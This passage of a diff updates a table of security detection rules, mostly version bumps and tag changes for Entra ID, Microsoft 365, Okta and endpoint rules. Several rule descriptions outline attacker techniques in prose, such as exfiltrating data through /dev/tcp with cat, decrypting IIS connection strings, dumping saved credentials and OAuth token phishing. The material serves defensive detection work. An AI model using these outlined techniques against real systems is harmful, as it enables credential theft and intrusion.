|[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 -|<> |Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |209 +|<> |Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 |<> |This rule correlate Azure or Office 356 mail successful sign-in events with network security alerts by source.ip. Adversaries may trigger some network security alerts such as reputation or other anomalies before accessing cloud resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Rule Type: Higher-Order Rule] |None |3 @@ -1274,25 +1290,27 @@ and their rule type is `machine_learning`. |<> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike] |None |218 -|<> |Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies concurrent azure signin events for the same user and from multiple sources, and where one of the authentication event has some suspicious properties often associated to DeviceCode and OAuth phishing. Adversaries may steal Refresh Tokens (RTs) via phishing to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 -|<> |Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 +|<> |Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |107 -|<> |Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 +|<> |Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |2 -|<> |Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 -|<> |Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 +|<> |Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |109 -|<> |Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |217 +|<> |Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |218 -|<> |Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attemopt to brute-force TOTP codes by generating several sessions and attempt to guess the correct code. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attemopt to brute-force TOTP codes by generating several sessions and attempt to guess the correct code. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 -|<> |Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3 +|<> |Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |4 |<> |Identifies Microsoft Entra ID Protection sign-in risk detections triggered by a range of risk events such as anonymized IP addresses, password spray attacks, impossible travel, token anomalies, and more. These detections are often early indicators of potential account compromise or malicious sign-in behavior. This is a promotion rule intended to surface all Entra ID sign-in risk events for further investigation and correlation with other identity-related activity. This is a building block rule that is used to collect all Microsoft Entra ID Protection sign-in or user risk detections. It is not intended to be used as a standalone detection. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection], [Data Source: Microsoft Entra ID Protection Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: BBR] |None |1 -|<> |Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection Logs], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |1 + +|<> |Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |5 |<> |Identifies when a new service principal is added in Microsoft Entra ID. An application, hosted service, or automated tool that accesses or modifies resources needs an identity created. This identity is known as a service principal. For security reasons, it's always recommended to use service principals with automated tools rather than allowing them to log in with a user identity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |108 @@ -1300,13 +1318,13 @@ and their rule type is `machine_learning`. |<> |This rule detects non-interactive authentication activity against SharePoint Online (`Office 365 SharePoint Online`) by a user principal via the `Microsoft Authentication Broker` application. The session leverages a refresh token or Primary Refresh Token (PRT) without interactive sign-in, often used in OAuth phishing or token replay scenarios. |[Domain: Cloud], [Use Case: Identity and Access Audit], [Tactic: Collection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |2 -|<> |Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 |<> |Detects a sequence of events in Microsoft Entra ID indicative of a suspicious cloud-based device registration, potentially using ROADtools. This behavior involves adding a device via the Device Registration Service, followed by the assignment of registered users and owners — a pattern consistent with techniques used to establish persistence or acquire a Primary Refresh Token (PRT). ROADtools, a popular red team toolkit, often leaves distinct telemetry signatures such as the `Microsoft.OData.Client` user agent and specific OS version values. These sequences are uncommon in typical user behavior and may reflect abuse of device trust for session hijacking or silent token replay. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 |<> |Identifies potential session hijacking or token replay in Microsoft Entra ID. This rule detects cases where a user signs in and subsequently accesses Microsoft Graph from a different IP address using the same session ID. This may indicate a successful OAuth phishing attack, session hijacking, or token replay attack, where an adversary has stolen a session cookie or refresh/access token and is impersonating the user from an alternate host or location. |[Domain: Cloud], [Domain: Identity], [Domain: API], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Resources: Investigation Guide], [Tactic: Defense Evasion], [Tactic: Initial Access] |None |5 -|<> |Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 +|<> |Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |3 |<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 @@ -1316,7 +1334,7 @@ and their rule type is `machine_learning`. |<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313 -|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |3 +|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |4 |<> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 @@ -1368,13 +1386,13 @@ and their rule type is `machine_learning`. |<> |This rule uses alert data to determine when multiple alerts in different phases of an attack involving the same host are triggered. Analysts can use this to prioritize triage and response, as these hosts are more likely to be compromised. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |6 -|<> |This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Domain: SaaS], [Resources: Investigation Guide] |None |307 +|<> |This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Domain: SaaS], [Resources: Investigation Guide] |None |308 |<> |Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |115 |<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |114 -|<> |Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 +|<> |Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 |<> |Identifies more than two Microsoft Entra ID Protection alerts associated to the user principal in a short time period. Microsoft Entra ID Protection alerts are triggered by suspicious sign-in activity, such as anomalous IP addresses, risky sign-ins, or other risk detections. Multiple alerts in a short time frame may indicate an ongoing attack or compromised account. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Protection Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 @@ -1382,9 +1400,9 @@ and their rule type is `machine_learning`. |<> |Detects when Okta user authentication events are reported for multiple users with the same device token hash behind a proxy. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210 -|<> |Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 -|<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 |<> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |115 @@ -1406,7 +1424,7 @@ and their rule type is `machine_learning`. |<> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |10 -|<> |Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |2 +|<> |Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Data Source: Sysmon] |None |3 |<> |This rule identifies an egress internet connection initiated by an SSH Daemon child process. This behavior is indicative of the alteration of a shell configuration file or other mechanism that launches a process when a new SSH login occurs. Attackers can also backdoor the SSH daemon to allow for persistence, call out to a C2 or to steal credentials. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 @@ -1452,19 +1470,21 @@ and their rule type is `machine_learning`. |<> |A new user was added to a GitHub organization. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Github] |None |206 -|<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |210 +|<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |211 + +|<> |This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 |<> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |212 |<> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |314 -|<> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Resources: Investigation Guide] |None |210 -|<> |Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. |[Domain: Cloud], [Data Source: 